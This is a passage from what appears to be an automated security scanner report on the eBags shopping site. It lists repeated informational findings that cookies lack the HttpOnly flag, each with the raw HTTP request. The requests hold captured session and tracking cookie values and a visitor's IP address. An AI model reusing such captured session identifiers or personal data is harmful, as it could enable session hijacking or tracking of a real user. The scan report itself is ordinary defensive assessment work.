Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.18. http://www.ebags.com/brand/lodis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lodis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.19. http://www.ebags.com/brand/michael-michael-kors-watches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/michael-michael-kors-watches

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.20. http://www.ebags.com/brand/quiksilver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/quiksilver

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.21. http://www.ebags.com/brand/timi-and-leslie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/timi-and-leslie

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.22. http://www.ebags.com/brands/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.23. http://www.ebags.com/category/backpack-handbags/20036676 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/backpack-handbags/20036676

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.24. http://www.ebags.com/category/carry-on-luggage/20048891 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/carry-on-luggage/20048891

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:10 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/carry-on-luggage/20048891 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/department/bags-by-ebags
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373777|PC#1293371743230-938821.20#1294581517|check#true#1293371977; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1250; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":2,"to":3.7,"c":"http://www.ebags.com/department/bags-by-ebags","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1293371915878}; s_sq=ebagsprod%3D%2526pid%253DSub%252520Site%252520%25253A%252520Bags%252520by%252520eBags%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fcategory%25252Fcarry-on-luggage%25252F20048891%2526ot%253DA

Response

3.25. http://www.ebags.com/category/clutches/20036679 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20036679

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/clutches/20036679 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.26. http://www.ebags.com/category/clutches/20048616 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20048616

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/clutches/20048616 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.27. http://www.ebags.com/category/cross-body-bags/20037212 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/cross-body-bags/20037212

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/cross-body-bags/20037212 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.28. http://www.ebags.com/category/handbags/10014 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/handbags/10014 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.29. http://www.ebags.com/category/handbags/10014/h/sale previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/handbags/10014/h/sale

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/handbags/10014/h/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.30. http://www.ebags.com/category/hobos/20036674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20036674

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/hobos/20036674 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.31. http://www.ebags.com/category/hobos/20048614 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/hobos/20048614

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:09:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/hobos/20048614 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.32. http://www.ebags.com/category/travel-accessories/20014443 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/travel-accessories/20014443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:53 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category/travel-accessories/20014443?ne=100 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373821|PC#1293371743230-938821.20#1294581561|check#true#1293372021; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1239; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371960055}; s_sq=ebagsprod%3D%2526pid%253DShopping%252520Cart%252520%25253A%252520View%252520Cart%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fsale%25252Ftravel_accessories%25252Fcategory_search%25252Findex.cfm%25253FNe%25253D100%252526N%25253D4001%25252B20014443%2526ot%253DA

Response

3.33. http://www.ebags.com/department/backpacks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/backpacks

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ACCT=guest; path=/
SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/backpacks HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

3.34. http://www.ebags.com/department/bags-by-ebags previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/department/bags-by-ebags

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:58:53 GMT; path=/
ACCT=guest; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/bags-by-ebags HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/product/case-logic/sony-psp-game-case/120830?productid=1312640&sourceID=BECOME01$couponid=40959822
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
